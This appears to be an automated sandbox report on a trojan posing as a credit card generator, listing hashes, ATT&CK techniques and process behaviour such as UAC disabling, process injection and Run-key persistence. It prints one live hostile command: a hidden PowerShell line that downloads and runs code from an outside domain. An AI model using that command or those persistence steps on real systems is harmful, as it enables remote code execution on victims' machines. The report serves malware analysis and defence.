54b2a237e237d0060e5d8f5ab612c0b236f5f39d07b311af99fa1e7e986ee0e9

General

Target

Credit Card Gen & Checker.exe
Size

1.5MB
MD5

50efa8e740357a86511b32b7f67193b0
SHA1

374e00d228ed1510f8cbc07558dd714b83e43f18
SHA256

54b2a237e237d0060e5d8f5ab612c0b236f5f39d07b311af99fa1e7e986ee0e9
SHA512

fc258fff378ae5ac756f4068c015b2bfea0047928f42c15867836f924eb4b95c1e6c404730a5c8dfd074b3e0208994530557b7aadb03868e4dc21d243a8e9a71
SSDEEP

12288:TyV3Wsxv4Til5TYyUyQc8uHgo2aYFSvRX55Lm1LsLzEg5xC4BSE9:TyxWcMoSDuAxaUSZDLmBsLzEg5xCvE9

Score

10^/10

discovery evasion persistence trojan vmprotect

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs
evasion trojan

Bypass User Account Control
T1548.002

Disable or Modify Tools
T1562.001

Modify Registry
T1112

Processes:

CardsChecker.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" CardsChecker.exe
Drops file in Drivers directory 1 IoCs

Processes:

svchost.exe

description ioc process

File opened for modification C:\Windows\system32\drivers\etc\hosts svchost.exe
Drops startup file 1 IoCs

Processes:

sysapp.exe

description ioc process

File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MicrosoftEdgeUpdate.lnk sysapp.exe
Executes dropped EXE 2 IoCs

Processes:

sysapp.exeCardsChecker.exe

pid process

2616 sysapp.exe
2244 CardsChecker.exe
Loads dropped DLL 3 IoCs

Processes:

Credit Card Gen & Checker.exesysapp.exe

pid process

2496 Credit Card Gen & Checker.exe
2496 Credit Card Gen & Checker.exe
2616 sysapp.exe

description	ioc	process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	svchost.exe

description	ioc	process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MicrosoftEdgeUpdate.lnk	sysapp.exe

pid	process
2496	Credit Card Gen & Checker.exe
2496	Credit Card Gen & Checker.exe
2616	sysapp.exe

VMProtect packed file 2 IoCs

Detects executables packed with VMProtect commercial packer.

vmprotect

Processes:

resource	yara_rule
C:\Users\Admin\AppData\Local\Temp\CardsChecker.exe	vmprotect
behavioral1/memory/2244-70-0x0000000000C60000-0x0000000000D64000-memory.dmp	vmprotect

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

sysapp.exeCardsChecker.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\Services = "C:\\Users\\Admin\\AppData\\Roaming\\{2BF762B1F4DD563484146}\\{2BF762B1F4DD563484146}.exe"	sysapp.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3692679935-4019334568-335155002-1000\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft.Inc = "cmd.exe /c powershell -NoProfile -WindowStyle Hidden -Command [AppDomain]::CurrentDomain.Load([Convert]::Frombase64String((New-Object System.Net.WebClient).Downloadstring('http://xiiideath.com/avx'))).EntryPoint.invoke($null,$null)"	CardsChecker.exe

Checks whether UAC is enabled 1 TTPs 2 IoCs

evasion trojan

System Information Discovery

T1082

Processes:

CardsChecker.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	CardsChecker.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	CardsChecker.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

2 drive.google.com
3 drive.google.com
Suspicious use of SetThreadContext 1 IoCs

Processes:

sysapp.exe

description pid process target process

PID 2616 set thread context of 2948 2616 sysapp.exe svchost.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
System Location Discovery: System Language Discovery 1 TTPs 1 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
discovery

System Language Discovery
T1614.001

Processes:

CardsChecker.exe

description ioc process

Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CardsChecker.exe

flow	ioc
2	drive.google.com
3	drive.google.com

description	pid	process	target process
PID 2616 set thread context of 2948	2616	sysapp.exe	svchost.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	CardsChecker.exe

Suspicious behavior: EnumeratesProcesses 19 IoCs

Processes:

sysapp.exesvchost.exe

pid	process
2616	sysapp.exe
2616	sysapp.exe
2616	sysapp.exe
2616	sysapp.exe
2948	svchost.exe
2948	svchost.exe
2948	svchost.exe
2948	svchost.exe
2948	svchost.exe
2948	svchost.exe
2948	svchost.exe
2948	svchost.exe
2948	svchost.exe
2948	svchost.exe
2948	svchost.exe
2948	svchost.exe
2948	svchost.exe
2948	svchost.exe
2948	svchost.exe

Suspicious use of AdjustPrivilegeToken 21 IoCs

Processes:

sysapp.exeCardsChecker.exe

description	pid	process
Token: SeIncreaseQuotaPrivilege	2616	sysapp.exe
Token: SeSecurityPrivilege	2616	sysapp.exe
Token: SeTakeOwnershipPrivilege	2616	sysapp.exe
Token: SeLoadDriverPrivilege	2616	sysapp.exe
Token: SeSystemProfilePrivilege	2616	sysapp.exe
Token: SeSystemtimePrivilege	2616	sysapp.exe
Token: SeProfSingleProcessPrivilege	2616	sysapp.exe
Token: SeIncBasePriorityPrivilege	2616	sysapp.exe
Token: SeCreatePagefilePrivilege	2616	sysapp.exe
Token: SeBackupPrivilege	2616	sysapp.exe
Token: SeRestorePrivilege	2616	sysapp.exe
Token: SeShutdownPrivilege	2616	sysapp.exe
Token: SeDebugPrivilege	2616	sysapp.exe
Token: SeSystemEnvironmentPrivilege	2616	sysapp.exe
Token: SeRemoteShutdownPrivilege	2616	sysapp.exe
Token: SeUndockPrivilege	2616	sysapp.exe
Token: SeManageVolumePrivilege	2616	sysapp.exe
Token: 33	2616	sysapp.exe
Token: 34	2616	sysapp.exe
Token: 35	2616	sysapp.exe
Token: SeDebugPrivilege	2244	CardsChecker.exe

Suspicious use of WriteProcessMemory 14 IoCs

Processes:

Credit Card Gen & Checker.exesysapp.exesvchost.exe

description	pid	process	target process
PID 2496 wrote to memory of 2616	2496	Credit Card Gen & Checker.exe	sysapp.exe
PID 2496 wrote to memory of 2616	2496	Credit Card Gen & Checker.exe	sysapp.exe
PID 2496 wrote to memory of 2616	2496	Credit Card Gen & Checker.exe	sysapp.exe
PID 2496 wrote to memory of 2244	2496	Credit Card Gen & Checker.exe	CardsChecker.exe
PID 2496 wrote to memory of 2244	2496	Credit Card Gen & Checker.exe	CardsChecker.exe
PID 2496 wrote to memory of 2244	2496	Credit Card Gen & Checker.exe	CardsChecker.exe
PID 2496 wrote to memory of 2244	2496	Credit Card Gen & Checker.exe	CardsChecker.exe
PID 2616 wrote to memory of 2948	2616	sysapp.exe	svchost.exe
PID 2616 wrote to memory of 2948	2616	sysapp.exe	svchost.exe
PID 2616 wrote to memory of 2948	2616	sysapp.exe	svchost.exe
PID 2616 wrote to memory of 2948	2616	sysapp.exe	svchost.exe
PID 2948 wrote to memory of 2772	2948	svchost.exe	WerFault.exe
PID 2948 wrote to memory of 2772	2948	svchost.exe	WerFault.exe
PID 2948 wrote to memory of 2772	2948	svchost.exe	WerFault.exe

System policy modification 1 TTPs 1 IoCs
evasion

Modify Registry
T1112

Processes:

CardsChecker.exe

description ioc process

Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" CardsChecker.exe

C:\Users\Admin\AppData\Local\Temp\Credit Card Gen & Checker.exe
"C:\Users\Admin\AppData\Local\Temp\Credit Card Gen & Checker.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:2496

C:\Users\Admin\AppData\Roaming\sysapp.exe
"C:\Users\Admin\AppData\Roaming\sysapp.exe"
2⤵
- Drops startup file
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2616

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
3⤵
- Drops file in Drivers directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2948

C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 2948 -s 220
4⤵
PID:2772

C:\Users\Admin\AppData\Local\Temp\CardsChecker.exe
"CardsChecker.exe"
2⤵
- UAC bypass
- Executes dropped EXE
- Adds Run key to start application
- Checks whether UAC is enabled
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- System policy modification
PID:2244

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Privilege Escalation

Abuse Elevation Control Mechanism

1

T1548

Bypass User Account Control

1

T1548.002

Boot or Logon Autostart Execution

1

T1547

Registry Run Keys / Startup Folder

1

T1547.001

Defense Evasion

Abuse Elevation Control Mechanism

1

T1548

Bypass User Account Control

1

T1548.002

Impair Defenses

1

T1562

Disable or Modify Tools

Modify Registry

Credential Access

Discovery

System Information Discovery

2

T1082

System Location Discovery

1

T1614

System Language Discovery

1

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

1

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\CardsChecker.exe

Filesize
693KB

MD5
6f14dcfb307f4f9d9fe04c277f9e6e73

SHA1
c1b3cf0ee07b96678b27f546a914cd4501c11b25

SHA256
b1fec85f2708e55f07e6301f8ac4f61457d8b5706dc72705d89a9001ee90ca5d

SHA512
8ef3c25434c004c2cdf3f07e4e632b42feb180ed740d34f4b5506ee0d387b12bbf0c34ce63250f64fef62de94843ec8a20e62887db0647d06818555b39ce9d80

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
1KB

MD5
b472e0939c64dc85f74e58a5264eb466

SHA1
c4c9947ca9ef55e8b13aaef3450bd413e97549de

SHA256
eb35b8ab410c02092711cec5fcd6938ef28fbbb7dfb24c6610e90ba3e9470994

SHA512
23db9d1d90297bc80ab4215ec7aa3052affcbd767debe7dd1590283d2be6d013eb6a5eb6c79b60bf245fdf8b53a4812b59a90b8016cf91b7aa97ed1c3df1db86

Download Submit
C:\Windows\System32\drivers\etc\hosts

Filesize
1KB

MD5
c55e7b590134bae106d2d8170affe162

SHA1
13b61495d4b1460ecb770e42a923c880a73ad692

SHA256
5d4c55ac6c8371c79f94a81c1e53fa50b0fa4231cda0fc9d93892739c723c7e7

SHA512
99162c8512811021c31c98cffe306b3badd07e779ac73d6da16e16d7597c1c8112b1a78dc33a27f717b13333bedf6a804a757e5030f653aeea41a338492c9e27

Download Submit
\Users\Admin\AppData\Roaming\sysapp.exe

Filesize
278KB

MD5
cfc83e7145c70e71874460c78a0e9cf4

SHA1
d3ec09e035916e8eceb14cd53650cc843606aae2

SHA256
ab97099d14bfaf3fcb3862628d710d5b6b2fa9afa30011ddcf686eb11d6ff92f

SHA512
b04b2809e9fff5172a356e9b0fc66c969d9ecf1fd804cf3ff002f489591b7a4e52ca7c5cc874e40fb3bed0982bcae78cc88bbfab52137a4564bdf482a4ad9eb4

Download Submit
memory/2244-21-0x000000007497E000-0x000000007497F000-memory.dmp

Filesize
4KB

Download
memory/2244-70-0x0000000000C60000-0x0000000000D64000-memory.dmp

Filesize
1.0MB

Download
memory/2244-75-0x0000000000500000-0x0000000000566000-memory.dmp

Filesize
408KB

Download
memory/2244-76-0x0000000074970000-0x000000007505E000-memory.dmp

Filesize
6.9MB

Download
memory/2244-78-0x000000007497E000-0x000000007497F000-memory.dmp

Filesize
4KB

Download
memory/2244-79-0x0000000074970000-0x000000007505E000-memory.dmp

Filesize
6.9MB

Download
memory/2948-23-0x000007FFFFFDB000-0x000007FFFFFDC000-memory.dmp

Filesize
4KB

Download
memory/2948-77-0x0000000140000000-0x000000014004C000-memory.dmp

Filesize
304KB

Download

Analysis

Sharing

General

Malware Config

Signatures

Processes

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads